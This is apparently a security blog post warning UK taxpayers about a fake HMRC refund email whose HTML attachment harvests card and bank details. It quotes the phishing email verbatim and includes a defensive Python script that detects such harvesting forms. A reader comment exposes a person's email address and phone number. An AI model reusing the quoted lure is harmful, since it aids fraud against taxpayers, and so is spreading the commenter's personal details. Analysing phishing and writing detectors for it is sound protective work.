Fake HMRC Tax Refund Mail Goes Phishing

If you pay taxes in the UK, please be aware that scammers are currently sending fake HMRC tax refund attachments via email. Here’s the email complete with attachment:

[Image: Fake HMRC tax refund]

The text reads as follows:

-----Original Message-----
From: HM Revenue & Customs [mailto:refund-taxAT@hmrc.gov.uk]
Sent: 09 December 2013 21:18
To: UK321712AThmrc.gov.co.uk.com
Subject: Submit Your Tax Refund

Dear Applicant:

Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the last seven years our calculations show you have made over payments of GBP 323.56 Due to the high volume of refunds due you must complete the online application, the telephone help line is unable to assist with this application.
In order to process your refund you will need to complete the attached application form.
Your refund may take up to 3 weeks to process please make sure you complete the form correctly.

To access your tax refund, please follow the steps below:

- download the Tax Refund Form attached to this email
- open it in a browser
- follow the instructions on your screen

Regards,
HM Revenue & Customs

This is, of course, complete nonsense. The attachment is a slice of HTML designed to open in a web browser. With JavaScript active, the scam can work some magic on unsuspecting victims.

[Image: Fake refund attachment]

The info requested by the scammers includes full name, address, date of birth, card number, sort code, account number, telephone, verification code and more.

Once the victim has filled everything in, they’re encouraged to press the “Submit informations” button. One would hope the typo would be enough to raise suspicion in some, but of course it won’t save everybody.

The scammers here are really quite precise with regard to the information they’re after. Make a mistake, leave a section blank or type something not to their liking, and…

[Image: Oops]

The form does this for everything – type more or less than a 16-digit credit card number, and it’ll tell you to go back and fix it. Place letters into the phone number? You’ll have to go back and fix it. Make a mess of the sort code / account number? You’ll have to… you guessed it… go back and fix it.

Here’s the full list of “You’ve been a very naughty boy” from the code:

[Image: Sir, yes Sir]

Hitting the submit button sends the information via the form to a .biz URL which appears to be compromised.
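For mail triage, the traits described above (an HTML attachment whose form asks for card and bank details and posts them to a remote host) can be checked statically without opening the file in a browser. The following is an added example, not code from the phish or from this blog; the keyword list, function names and sample attachment are constructed, and `collector.example` is a placeholder host.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed keyword list covering the kinds of data the form asks for.
SENSITIVE = ("card", "sort", "account", "birth", "dob", "cvv", "verification")

class FormAudit(HTMLParser):
    """Collect each <form>'s action URL and the names of its input fields."""
    def __init__(self):
        super().__init__()
        self.forms = []      # one dict per form: {"action": str, "fields": [str]}
        self.scripts = 0     # number of <script> tags seen in the attachment

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "fields": []})
        elif tag in ("input", "select", "textarea") and self.forms:
            name = (a.get("name") or a.get("id") or "").lower()
            self.forms[-1]["fields"].append(name)
        elif tag == "script":
            self.scripts += 1

def triage_html_attachment(html):
    """Flag forms that request sensitive fields and submit to a remote host."""
    audit = FormAudit()
    audit.feed(html)
    findings = []
    for form in audit.forms:
        host = urlparse(form["action"]).hostname   # None for relative actions
        asked = sorted({k for k in SENSITIVE for f in form["fields"] if k in f})
        if host and asked:
            findings.append({"posts_to": host, "sensitive": asked,
                             "has_script": audit.scripts > 0})
    return findings

# Constructed sample attachment; only the button label is taken from the page.
SAMPLE = """<html><body>
<script>function check(f){ if(f.cardnumber.value.length!=16){alert('fix');return false;} return true; }</script>
<form method="post" action="http://collector.example/save.php" onsubmit="return check(this)">
<input name="fullname"><input name="dob"><input name="cardnumber">
<input name="sortcode"><input name="accountnumber"><input name="phone">
<input type="submit" value="Submit informations">
</form></body></html>"""

if __name__ == "__main__":
    for finding in triage_html_attachment(SAMPLE):
        print(finding)
```

A legitimate notification has no reason to ship a local HTML file that posts bank details to a third-party host, so any finding here is worth quarantining for review.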

HMRC have some advice for those unlucky enough to be sent a phishing mail on their Reporting a Phish page. The golden rule:

  • HM Revenue & Customs (HMRC) will never send notifications of a tax rebate by email, or ask you to disclose personal or payment information by email.

Scammers will often send victims malware attachments instead of a phishing mail, so it pays twice over to steer clear of random tax refund emails.

A few weeks before the holidays begin is not a good time to have your bank account cleaned out by a tax phish Scrooge.

Christopher Boyd (Thanks to Dom for sending this over)


  • https://www.facebook.com/carmella.smith.1232 Carmella Smith

    Hello Malwarebytes,
    Your product is fantastic. Alas, I seem to have gotten a virus not yet detected by your free version. It uses apaqz.exe, I see boatloads of traffic seen in httpanalyzer even when no browser is open. Opening IE gets many new tabs with advertising in them. Removing registry entries or changing the value does not help; they come back. Registry entry key may be Xyfeokxe or Okwucyip. Would you like more information about the registry entries? Anything else I can provide? Thanks so much for considering it.

  • https://www.facebook.com/carmella.smith.1232 Carmella Smith

    I’m at csmith@iii.com, or 510 450-6363 x4220. Thanks so much.
